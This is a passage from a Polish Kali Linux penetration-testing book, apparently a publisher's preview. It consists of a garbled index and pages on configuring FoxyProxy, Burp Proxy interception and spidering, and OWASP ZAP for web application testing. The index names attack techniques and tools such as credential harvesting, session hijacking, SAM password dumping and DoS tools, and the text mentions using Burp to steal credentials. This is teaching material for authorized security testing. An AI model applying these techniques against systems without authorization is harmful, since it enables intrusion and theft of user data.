CmosPwd 190
Cookie Cadger 203dane o sesji 204
Cookie Injector 200cookie injector tool 198cookies 197Cookies Manager+ 198 201COTS 231cracks per second 139Crackstation 278creddump 191cross-site scripting 223Crunch 169 185
znaki specjalne 186CutyCapt 327czarne pude ko 24
DDBPwAudit 229dc3dd 293 297dd 291DDoS 256
kategorie atakoacutew 256obrona przed atakiem 285
Debian 38Denial of Service 256dictstat 189Dig 71DirBuster 128
raport 130Distributed Denial of Service
256DNS 267DNSChef 266dokumentacja 306DoS 256
kategorie atakoacutew 256obrona przed atakiem 285
dost p do systemualternatywny 37techniki XSS 225
dost pno 30Dradis 325Driftnet 217dsniff 212
nas uchiwaniei przechwytywaniepakietoacutew 213
uruchamianie 214dual-boot configuration 44
EEDGAR 57EF 31ekspertyza ledcza 289e-mail relay server 124encrypted passwords 137Equifax Secure Certificate
Authority 282Ettercap 214
lista celoacutew 216skanowanie sieci 216
Exploitation Tools 36 37 48exploity 92 113
Reserve_TCP Meterpreter156
Ffa szywe
adresy IP 285odpowiedzi DNS 267witryny 159 252
Ferret 209uruchamianie 210
FHS 38Fierce 73Fimap 254findmyhash 190fingerprinting 93Firefox wtyczki 198 236Firesheep 199FOCA 84
utworzenie nowego projektu84
Foremost 299Forensics 48 290FoxyProxy 236fping 70funkcja skroacutetu 170
kopie no nikoacutew danych 288fuzzing aplikacji internetowych 93
Ggenerator
hase 278adunkoacutew 132
GHDB 63GIT 250glosariusz 319
Kup książkę Poleć książkę
Skorowidz
331
Google hacking 61Google Hacking Database 63Google Internet Authority 282GPU 177Greasemonkey 200grey-box 25 30gromadzenie danych 34GRUB 44Gruyere 224 246
instancja projektu 225
HHackBar 219Hak5 Pineapple 211Hamster 208Hardware Hacking 48hashcat 177hashed passwords 137Hash-identifier 188has a 137
dost pu 250generowanie listy 185amanie 169
ochrona 170polityka zarz dzania 277przechowywanie 278przechwytywanie 157 169
249si a 277w systemie Linux 173w systemie Windows 171
haszowanie 170z dodatkiem soli
kryptograficznej 170hexinject 228hiper cza spreparowane 196home feed option 163hosty skanowanie 162HTTrack 66 279Hydra 125
uruchomienie 128
IICMP Echo Request 70identyfikacja
adresoacutew URL 227celoacutew za pomoc serweroacutew
DNS 73obszaroacutew krytycznych 27typoacutew haszowanych warto ci
188
iFrame 196Information Gathering 34 46informatyka ledcza 287
zasady 288integralno 30intercept proxy 105interfejs p tli zwrotnej 239Inundator 269in ynieria
spo eczna 148wsteczna 48
ionCube Loader 64IP Forwarding 141IPSIDS 231iptables 142
Jj zyk SQL 218John the Ripper 137 173
domy lna konfiguracjacie ek 176
haszowanie 170amanie hase 174
proces 137amanie pliku hase 139
s owniki 138 177szybko dzia ania 138
Johnny 138amanie hase 174
opcje konfiguracyjneprogramu 175
s owniki 177uruchamianie 175
KKali Linux 15
aktualizacja pakietu SET 150instalowanie 40
pakietoacutew 43konfiguracja 39Live CD 180 290minimalne wymagania
sprz towe 40narz dzia dost pne
w systemie 46Network Install 40proces konfigurowania
partycji dysku 42publiczny adres IP 225s owniki 129
uruchamianiew maszynie wirtualnej 46w trybie Forensics 290z no nika zewn trznego 39
wprowadzenie do systemu 38karty dost pu 194KeepNote 326klienty 91 147
aplikacji internetowych 169191
HTTP 262klonowanie
rodowiska 278witryny internetowej 66 153
158 251 279klucze uruchamiania systemu
171 173komunikaty
ICMP 70o up ywie czasu dania 70
kopiowanie plikoacutew SAMi SYSTEM z hosta 172
LLinux amanie hase 173lista
adresoacutew URL 227potencjalnych hase 185
listener port 142Live HTTP Headers 134Local File Inclusion 254Logical Volume Manager 43LOIC 263
tryby 266luki w zabezpieczeniach
aktualizacja bazy 276aplikacji internetowych 245
254hostoacutew 167przegl darek 232raport ko cowy 315systemoacutew poczty
elektronicznej 123usuwanie 276wstrzykiwanie kodu SQL 221wstrzykiwanie skryptoacutew 223wykorzystywanie 113wyszukiwanie 92
LVM 43
Kup książkę Poleć książkę
Skorowidz
332
adunek 117amanie hase 137 169
bezp atne us ugi sieciowe190
haszowanych 189maska 189narz dzia 174przechowywanych w plikach
systemowych 169si owe 229systemu Linux 173techniki 169za pomoc John the Ripper
174zabezpieczaj cych BIOS
komputera 190cza modyfikacja 196
MMAC 172MagicTree 327Maintaining Access 38 48Maltego 58 74
zadania 76Maltego CaseFile 326man-in-the-middle 139 211
obrona przed atakiem 281przeprowadzanie manualne
212maska 189mechanizmy
HSTS 140klonowania 153obronne 231 271
testowanie 273pasywnego nas uchiwania 208renegocjacji bezpiecznego
po czenia SSL 257usuwania mi kkich b doacutew
404 93mened er LVM 43metadane 83
wyszukiwanie i analiza 83Metasploit 113 154
skanowanie sieci lokalnej 114wersja konsolowa 114
meterpreter 151uruchomienie sesji 156wykorzystanie 156
metodologiacertyfikacji CISSP 193testoacutew penetracyjnych 24
310 323metody
pojedynczegouwierzytelniania 194
szyfrowania 283mirror server 43MitM Proxy 161montowanie dyskoacutew z systemem
Windows 172
Nnag oacutewki X-Frame-Options 287narz dzia
do klonowania witryn 281do amania hase 174do przechwytywania sesji
198do przeprowadzania atakoacutew
DoSDDoS 285ledcze 295
wspomagaj ce tworzenieraportoacutew 325
nas uchiwaniepakietoacutew sieciowych 199ruchu sieciowego 143 228
nazwy DNS 71Nessus 162
HomeFeed 163instalowanie w systemie
Kali Linux 163ProfessionalFeed 163raporty 167 168skanowanie hostoacutew 166uruchomienie 164u ywanie 164
Netcat 124NetFlow 286NGIPS 236Niskoorbitalne Dzia o Jonowe
263Nmap 76
agresywne skanowanie 79graficzny interfejs
u ytkownika 77okno wynikoacutew skanowania 82opcje 79
NoScript 287no niki danych 288
Oobrona przed atakami
Clickjacking 287DoS 285man-in-the-middle 281przechwytywanie ciasteczek
286SSLstrip 284
ocena ryzyka 30formu y 31okna serwisowe 277
ocl 178oclHashcat 177odgadywanie hase 169okna serwisowe 277Ophcrack 183
uruchomienie w Kali Linux184
osobista weryfikacja to samo ci194
oszacowanie bezpiecze stwa 21o wiadczenie o zachowaniu
poufno ci 307otwarta implementacja sterownikoacutew
kart graficznych 178Owasp-Zap 105 245
automatyczne logowanie 110konfigurowanie przegl darki
108mechanizm aktualizacji ca ego
pakietu 110proces uwierzytelniania 109przeprowadzanie atakoacutew 109raporty 111
PPAE 39pakiety
ARP 212czas ycia 259MitM Proxy 161SET 149 249sieciowe 259TCP 259
pami masowa urz dze 289partycje 172
wymiany 291Pasco 299Password Attacks 37 47 174Patator 229
Kup książkę Poleć książkę
Skorowidz
333
pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki
binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180
wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie
299poczta elektroniczna 123
fa szywe wiadomo ci 159podatno na atak 29
aktualizacja bazy 276aplikacji internetowych 245
254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226
podnoszenie uprawnie 37podstawowe wymogi
bezpiecze stwa 303podsumowanie ustale 313polecenia
apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70
getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116
polityka zarz dzania has ami 277po czenia
HTTP 268HTTPS 268
po czeniaTCP 267troacutejetapowe 79VPN 282
poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276
porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142
poufno 30poziom zabezpiecze
minimalny 274podstawowy 274
PREROUTING 143
Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty
Emily 59Gruyere 224 246
promiscuous mode 47Protocol Attacks 256protoko y
8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281
ProxyStrike 98robot sieciowy 100
przechwytywanieciasteczek 197 209 286danych logowania
u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych
w sieci 217pakietoacutew 213
sieciowych 210TCP 259
przechwytywaniepo cze 161
TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267
270sesji 197 208 233
narz dzia 198przegl d projektu 306przegl darki 232
ochrona przed atakami 236zabezpieczenia 249
przekazywanie pakietoacutew IP 142212
przekierowaniepo cze 284portoacutew komunikacyjnych
142ruchu sieciowego 141sesji 284
przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173
Kup książkę Poleć książkę
Skorowidz
334
RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy
b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce
tworzenie 325o wiadczenie o zachowaniu
poufno ci 307podatno ci i luki
w zabezpieczeniach 315podsumowanie ustale 313
zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury
testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje
dla rodowiska sieciowego316
wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami
dokumentacji 308zgodno ze standardami
i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316
powykonawcze 28rekonesans 34 51
badanie zasoboacutew siecikomputerowych 65
Google hacking 61
Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy
adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u
ICMP 69z wykorzystaniem serweroacutew
DNS 71zadania 52zasoby serwisoacutew
spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54
rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia
zdarzenia 31rootkit 295rozsy anie spreparowanych
pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206
adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285
SSAM 171samdump2 178Scalpel 299
Scapy 257 259scenariusze atakoacutew 260
security assessment 21security audit 21serwery 91
aplikacji internetowych 92223zabezpieczanie 136 249
atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236
wykorzystanie 238Samba 116sieciowe 91WWW 262
serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71
serwisy spo eczno ciowe 58sesja 195
ciasteczka 197logowania 205mechanizmy bezpiecze stwa
195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249
adres IP sklonowanej witryny158
aplet Java 156Credential Harvester Attacks
157Exploit to deliver 154importowanie w asnych
plikoacutew witrynyinternetowej 158
IP addresshostname forreverse connection 154
mechanizmy chroni ceprzeprowadzany atak 155
NATPort forwarding 154przechwycenie nazw kont
i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych
wiadomo ci 159URL you want to clone 154
Kup książkę Poleć książkę
Skorowidz
335
uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku
z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery
biometryczne 194stron internetowych 246
skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u
ICMP 70Skipfish 95
raport 97s owniki 96
skryptyopakowuj ce 228wykrywanie
nieautoryzowanychskryptoacutew 287
XSS 224 226SLE 31Slowloris 261s owa kluczowe
dbs 222FUZZ 133 135tables 222
sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata
31sqlmap 221SSL stripping 140SSLstrip 140 197 211
konfigurowanieprzekierowania portoacutew 142
mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141
SSO 194
standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293
baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy
BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia
i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231
szablony witryn 251szare pude ko 24szyfrowane po czenia
https 197VPN 282
Ttablice t czowe 170 189
amanie hase systemuWindows 183
Tamper Data 125TCPReplay 270Tenable 163testowanie
dzia ania roacute nych urz dzesieciowych 270
mechanizmoacutew obronnych 273odporno ci na przeci enia
268podatno ci na ataki XSS 224sklonowanego rodowiska
279testy
o nieograniczonym zakresiedzia ania 26
odporno ci na przeci eniesystemu 256
warunkoacutew skrajnych 256
testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu
zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu
Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33
THX-SSL-DOS 257tokeny 194
sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259
Uumowy
oczekiwania klienta 317potencjalne problemy
i zagadnienia 324rozliczane wed ug zu ycia
czasu i zasoboacutew 305wykaz prac 319ze sta cen 304
unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi
NAT 251profesjonalne 304w chmurze 211
usuwanie ladoacutew w amania 38utrzymanie zdobytego
przyczoacute ka 37uwierzytelnianie 193
ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193
Kup książkę Poleć książkę
Skorowidz
336
VVega 101
modu serwera proxy 104zestawienie znalezionych
podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32
Ww3af 120
wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122
w3mir 281warto
ryzyka 32sumy kontrolnej 293zasobu 31
WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92
obs uga programu 93raport 95
WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132
Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171
ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie
plikoacutew 172partycja systemu 172uzyskanie dost pu do
systemu 180Windows Reverse_TCP
Meterpreter 154Wireless Attacks 47Wireshark 206
filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie
ciasteczek 198kodu 248
kodu SQL 218pakietoacutew 228skryptoacutew 223
wtyczki przegl darki Firefox 198wykaz prac
dodatkowe elementy 323dodatkowe uzgodnienia
prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania
i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy
penetracyjne 321wykorzystywanie
b doacutew w zabezpieczeniachprzegl darki 196
exploitoacutew 92luk w zabezpieczeniach 113
254systemoacutew poczty
elektronicznej 123zidentyfikowanych
podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie
luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92
wytyczne 28 304
XXSS 223
aplikacje internetowe 248testowanie podatno ci 224
XSS cookie stealing 225
Zzabezpieczanie
serweroacutew aplikacjiinternetowych 249
systemoacutew pod czonychdo internetu 271
zakres prac 319cel testu 33definicja
przestrzeni celoacutew 27systemoacutew 26
zdobycia flagi 28dokument 25identyfikacja obszaroacutew
krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o
planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby
prze amywaniazabezpiecze 27
rekomendacjepowykonawcze 28
specyfikacja raportuko cowego 28
ZAP 236 245obrona przed zdalnymi
atakami 249Zaproxy 105zarz dzanie
aktualizacjami 275poprawkami zabezpiecze
275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308
zasoby sieciowe odpornona przeci enie 263
zatarcie ladoacutew penetracji systemu38
zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125
Host details 81Zero-day 275zewn trzny dysk USB 292zmienne
LHOST 118RHOST 117
znaczniki czasu 172zrzut okna 327
daniaForm 131mapowanie 24
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
236
Obrona przed atakami dokonywanymi z u yciem narz dzi penetracyjnych opartych na prze-gl darkach jest bardzo trudna Najlepszym rozwi zaniem jest oczywi cie zadbanie o to aby zaw-sze korzysta z najnowszej wersji przegl darki z zainstalowanymi najnowszymi pakietami aktuali-zacji oraz z wy czon mo liwo ci uruchamiania apletoacutew Java czy animacji Flash Oproacutecztego dodatkow warstw zabezpiecze mog zapewni rozwi zania pozwalaj ce na wykrywanienajcz ciej spotykanych zagro e takie jak system NGIPS (ang Next Generation IntrusionPrevention System) Znacz c wi kszo ofiar atakoacutew przeprowadzonych z wykorzystaniemnarz dzi takich jak BeEF stanowi u ytkownicy ktoacuterzy klikn li specjalnie przygotowane czezamieszczone w wiadomo ci poczty elektronicznej lub udost pnione w popularnych serwi-sach spo eczno ciowych przez napastnika podaj cego si za kogo innego godnego zaufania
FoxyProxy mdash wtyczka przegl darki Firefox
Je eli masz przegl dark Firefox i chcesz u ywa serweroacutew proxy takich jak ZAP mdash Zed At-tack Proxy czy BURP do testowania aplikacji internetowych to mo esz skorzysta z wtyczkiFoxyProxy ktoacutera znakomicie upraszcza proces prze czania oraz w czania i wy czania po-szczegoacutelnych serweroacutew proxy Inaczej moacutewi c FoxyProxy to wtyczka przegl darki Firefoxpozwalaj ca na atwe zarz dzanie serwerami proxy modyfikacj ich ustawie oraz ich w -czanie i wy czanie Wtyczk FoxyProxy mo esz pobra z sieciowego repozytorium rozsze-rze programy Firefox
Gdy zainstalujesz wtyczk na pasku narz dzi w goacuternej cz ci g oacutewnego okna przegl darkipojawi si ikona FoxyProxy Kiedy j klikniesz lewym przyciskiem myszy wy wietli si oknoopcji i ustawie wtyczki
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
237
Aby doda nowy serwer proxy do wtyczki FoxyProxy powiniene wykona polecenia przed-stawione poni ej
1 Kliknij przycisk Add New Proxy Na ekranie pojawi si nowe okno dialogowe 2 Wybierz opcj Manual Proxy Configuration 3 Wpisz adres IP lub nazw serwera proxy oraz podaj numer jego portukomunikacyjnego
4 Kliknij przycisk OK aby zapisa ustawienia nowego serwera
W tym momencie wtyczka FoxyProxy jest jeszcze wy czona co oznacza e ca y ruch sieciowygenerowany przez przegl dark odbywa si bez po rednictwa serwera proxy (w polu SelectMode jest ustawiona opcja Completely disable FoxyProxy) Aby u y wybranego serwera proxyrozwi list Select Mode i wybierz z niej dan opcj Jak wida dzi ki takiemu rozwi zaniumo esz szybko prze cza przegl dark na roacute ne serwery proxy lub ca kowicie wy czymo liwo korzystania z serwera proxy
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
238
BURP Proxy
BURP Proxy to narz dzie ktoacutere przechwytuje ruch HTTP oraz HTTPS co pozwala pentesterowina badanie funkcjonowania aplikacji internetowych wyszukiwanie luk w ich zabezpieczeniachoraz analizowanie ruchu sieciowego generowanego mi dzy serwerem aplikacji a klientemPakiet BURP Proxy cieszy si ogromn popularno ci nie tylko ze wzgl du na zdolno prze-prowadzania analizy ruchu sieciowego ale roacutewnie a mo e przede wszystkim ze wzgl du namo liwo modyfikacji i retransmitowania przesy anych da bdquow locierdquo Za chwil wyja nimy jakwykorzysta pakiet BURP Proxy do modyfikowania da i wykradania danych uwierzytel-niaj cych u ytkownikoacutew
Pami taj e BURP Proxy to narz dzie wchodz ce w sk ad rozbudowanego pakietu narz dzio nazwie Burp Suite Kiedy u ytkownik wpisuje na pasku adresu swojej przegl darki wybranyadres URL taki jak na przyk ad httpwwwDrChaoscom oczekuje e zostanie przeniesionyna tak stron Serwer proxy przechwytuje takie danie i przesy a je do serwera niejakobdquow imieniurdquo danego klienta Serwery proxy s zazwyczaj wykorzystywane do monitorowania ge-nerowanego ruchu sieciowego oraz ochrony klientoacutew przed potencjalnie szkodliwymi danymi(np witrynami ze z o liwym oprogramowaniem czy witrynami zainfekowanymi) Jako pente-ster mo esz wykorzystywa serwery proxy do przechwytywania ruchu sieciowego wysy anegoprzez klienta a nast pnie kopiowania modyfikowania i retransmitowania jego da
Aby w systemie Kali Linux uruchomi program BURP Suite w menu g oacutewnym przejd do grupyKali Linux a nast pnie wybierz polecenie SniffingSpoofingWeb Sniffersburpsuite
Na ekranie pojawi si g oacutewne okno pakietu Burp Suite
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
239
Aby skonfigurowa serwer proxy przejd na kart Proxy Jak atwo zauwa y opcja przechwyty-wania ruchu sieciowego jest domy lnie w czona (Intercept is on) Kiedy jest w czona BURPProxy zatrzymuje wszystkie dania wysy ane z przegl darki klienta do serwera WWW dzi kiczemu pentester ma mo liwo pe nej analizy takiego po czenia Po zako czeniu przegl da-nia pentester mo e r cznie zezwoli na kontynuowanie po czenia
Opcj Intercept musisz wy czy r cznie w przeciwnym wypadku wszystkie dania wysy ane przezklienta b d przechwytywane i zatrzymywane na poziomie BURP Proxy
Kolejne opcje konfiguracyjne na ktoacutere musisz zwroacuteci uwag s umieszczone na karcieOptions Znajdziesz tutaj opcje pozwalaj ce na sprawdzenie lub zmian domy lnego portukomunikacyjnego wykorzystywanego przez BURP Proxy czy skonfigurowanie interfejsu sie-ciowego wykorzystywanego przez pakiet Domy lnie serwer BURP Proxy jest skonfigurowa-ny do pracy na interfejsie p tli zwrotnej jak przedstawiono na rysunku zamieszczonym poni ejInterfejs p tli zwrotnej to specjalny rodzaj interfejsu sieciowego reprezentuj cy komputer lokal-ny do ktoacuterego przypisany jest zazwyczaj adres IP 127001 Interfejs p tli zwrotnej nie jestpowi zany z adnym urz dzeniem fizycznym i jest stosowany po to aby korzystaj c z po -czenia sieciowego system operacyjny Twojego komputera moacuteg si komunikowa sam ze so-b Inaczej moacutewi c je eli chcesz poprzez sie wysy a do siebie wiadomo ci powinieneu y interfejsu p tli zwrotnej Je eli chcesz wykorzystywa pakiet Burp Suite do pracy z innymikomputerami powiniene w konfiguracji pakietu doda odpowiedni interfejs Ethernet orazpoda jego adres IP
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
240
W naszym przyk adzie b dziemy u ywa interfejsu p tli zwrotnej
Kolejnym etapem b dzie skonfigurowanie przegl darki do pracy z pakietem Burp SuitePraktycznie wszystkie przegl darki mo na skonfigurowa w niemal identyczny lub przynajm-niej bardzo zbli ony sposoacuteb Na kolejnym rysunku przedstawiamy konfiguracj serwera proxyw przegl darce Firefox
Gdy zako czysz konfiguracj serwera proxy w przegl darce przejd na dowoln stron WWWna przyk ad wpisuj c dany adres URL w pasku przegl darki (na przyk ad wwwDrChaoscom)Z pewno ci zauwa ysz e nic si nie wydarzy o Dzieje si tak poniewa opcja Intercept
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
241
jak pami tasz jest domy lnie w czona Je eli przyjrzysz si teraz karcie Intercept to przeko-nasz si e zmieni si jej kolor t a co oznacza e przechwycone zosta o nowe danie
Kiedy klikniesz kart Intercept b dziesz moacuteg dok adnie zbada natur przechwyconego -dania Po zako czeniu mo esz klikn przycisk Forward lub Drop co spowoduje odpowied-nio przes anie dalej lub zablokowanie przechwyconego dania
Je eli klikniesz przycisk Forward zobaczysz e przechwycone danie zostaje przekazane dalejdo serwera WWW a serwer odsy a odpowied Co wi cej powiniene roacutewnie zobaczy estrona WWW zosta a za adowana w oknie przegl darki Pami taj jednak e niektoacutere stronyWWW sk adaj si z wielu komponentoacutew i ich za adowanie b dzie wymaga o r cznego prze-kazania wielu da (czyli b dziesz musia wiele razy klika przycisk Forward)
Kolejn ciekaw i u yteczn funkcj pakietu jest Burp Spider czyli robot sieciowy pozwala-j cy na zautomatyzowanie procesu wykrywania i mapowania aplikacji internetowych Zanimb dziesz moacuteg z niego skorzysta musisz najpierw skonfigurowa serwer BURP Proxy dopracy z internetem tak jak to pokazywali my wcze niej Nast pnie w cz modu Burp Spiderktoacutery mo e automatycznie mapowa wszystkie przechwycone dania i wyszukiwa nowepotencjalne cele ataku
Aby u y modu u Burp Spider przejd na kart Spider gdzie zobaczysz domy lne ustawieniakonfiguracyjne robota sieciowego Aby w czy robota kliknij przycisk Spider is paused couruchomi robota i zmieni nazw przycisku na Spider is running (zobacz pierwszy rysunek nanast pnej stronie)
Burp Spider mapuje wszystkie dania przechwycone przez serwer proxy i wy wietla je na karcieTarget Aby zobaczy co zosta o do tej pory przechwycone przejd na kart Target Znajdziesztam list wszystkich przechwyconych przez proxy witryn z ktoacuterymi czy si wybrana przezCiebie witryna podczas adowania Adresy URL wy wietlone w szarym kolorze oznaczaj witrynyktoacuterych nie przegl da e bezpo rednio Adresy URL wyroacute nione czarnym kolorem oznaczajwitryny ktoacutere odwiedzi e bezpo rednio (zobacz drugi rysunek na nast pnej stronie)
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
242
Aby skorzysta z robota sieciowego kliknij wybrany adres URL prawym przyciskiem myszyi z menu podr cznego wybierz polecenie Spider this host
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
243
Je eli teraz przejdziesz na kart Spider to przekonasz si e liczby przetworzonych daw sekcji Spider Status rosn od 0 w goacuter
Gdy Burp napotka jakie formularze poprosi Ci o ich wype nienie lub zignorowanie Je eliwype nisz formularz Burp sprawdzi kolejne strony ktoacutere sta y si dost pne po wype nieniuformularza
Kiedy Spider zako czy dzia anie wroacute na kart Targets i poszukaj strony ktoacuterej adres wybra edla robota sieciowego Kliknij ikon troacutejk ta znajduj c si z lewej strony adresu spowodujeto rozwini cie listy Teraz mo esz zobaczy wyniki dzia ania modu u Spider na pierwszym ry-sunku na nast pnej stronie
Burp wy wietla wszystkie strony i cza ktoacutere znalaz Spider Oproacutecz tego robot przechwytujeroacutewnie g oacutewny katalog hosta style stron internetowych podkatalogi oraz skrypty Java W kolej-nym przyk adzie prezentujemy szereg katalogoacutew przechwyconych z witryny wwwDrchaoscom
Burp pozwala roacutewnie na filtrowanie wynikoacutew Aby skorzysta z tej mo liwo ci kliknij pasekFilter znajduj cy si w goacuternej cz ci okna programu Na ekranie pojawi si rozwijane oknozawieraj ce szereg roacute nych opcji filtrowania (zobacz drugi rysunek na nast pnej stronie)
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
244
Modu Spider pakietu Burp Suite pozwala pentesterowi na sprawdzenie jak dana aplikacja inter-netowa czy strona WWW jest skonfigurowana oraz jakie mo na na niej znale cza i dok dprowadz Dobr analogi funkcjonalno ci tego modu u mo e by sytuacja w ktoacuterej znajdujemysi w pokoju z dziesi tkami drzwi i mo emy od razu w tym samym czasie sprawdzi dok dprowadz ka de z nich
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
245
OWASP-ZAPZAP to proste w u yciu zintegrowane narz dzie penetracyjne przeznaczone do wyszukiwa-nia podatno ci i luk w zabezpieczeniach aplikacji internetowych Jak pami tasz w rozdziale 3 do-konali my kroacutetkiej prezentacji tego narz dzia i jego mo liwo ci w zakresie skanowania witryninternetowych pod k tem potencjalnych s abych stron zabezpiecze Powroacutecimy teraz dopracy z tym narz dziem i poka emy jak mo na u y programu ZAP do identyfikacji i wykorzy-stywania luk pozwalaj cych na przeprowadzanie atakoacutew typu cross-site scripting (atakoacutew XSS)
ZAP jest pakietem preinstalowanym w systemie Kali Linux 10 Aby go uruchomi w menug oacutewnym przejd do grupy Kali Linux i nast pnie wybierz polecenie SniffingSpoofingWebSniffersowasp-zap Zamiast tego mo esz po prostu otworzy nowe okno terminala i wpisapolecenie zap tak jak to zosta o zaprezentowane na rysunku poni ej
Przedstawiamy kroacutetki opis sposobu konfiguracji pakietu ZAP do pracy z przegl dark Firefoxpodobnie jak to mia o miejsce w rozdziale 3
1 Zaakceptuj postanowienia licencyjne 2 Wygeneruj nowy certyfikat SSL lub zaimportuj certyfikat istniej cy 3 Zaimportuj certyfikat do przegl darki Aby to zrobi w przegl darce Firefoxwybierz z menu polecenie PreferencesAdvanced i nast pnie przejd na kartEncryption
4 Kliknij przycisk View Certificates i zaimportuj certyfikat 5 Zaznacz wszystkie opcje zaufania zwi zane z u ywaniem nowego certyfikatu 6 Skonfiguruj przegl dark do pracy z serwerem proxy pakietu ZAP Aby to zrobiw przegl darce Firefox wybierz z menu polecenie PreferencesAdvanced i nast pnieprzejd na kart Network
7 Jako nazw serwera proxy wpisz localhost i ustaw go do pracy na porcie 8080ktoacutery jest domy lnym portem komunikacyjnym serwera proxy pakietu ZAP
8 Zaznacz opcj pozwalaj c na u ywanie serwera proxy dla wszystkich protoko oacutewkomunikacyjnych
Pami taj e zanim b dziesz moacuteg u ywa pakietu ZAP musisz wygenerowa odpowiedni certyfikat SSL
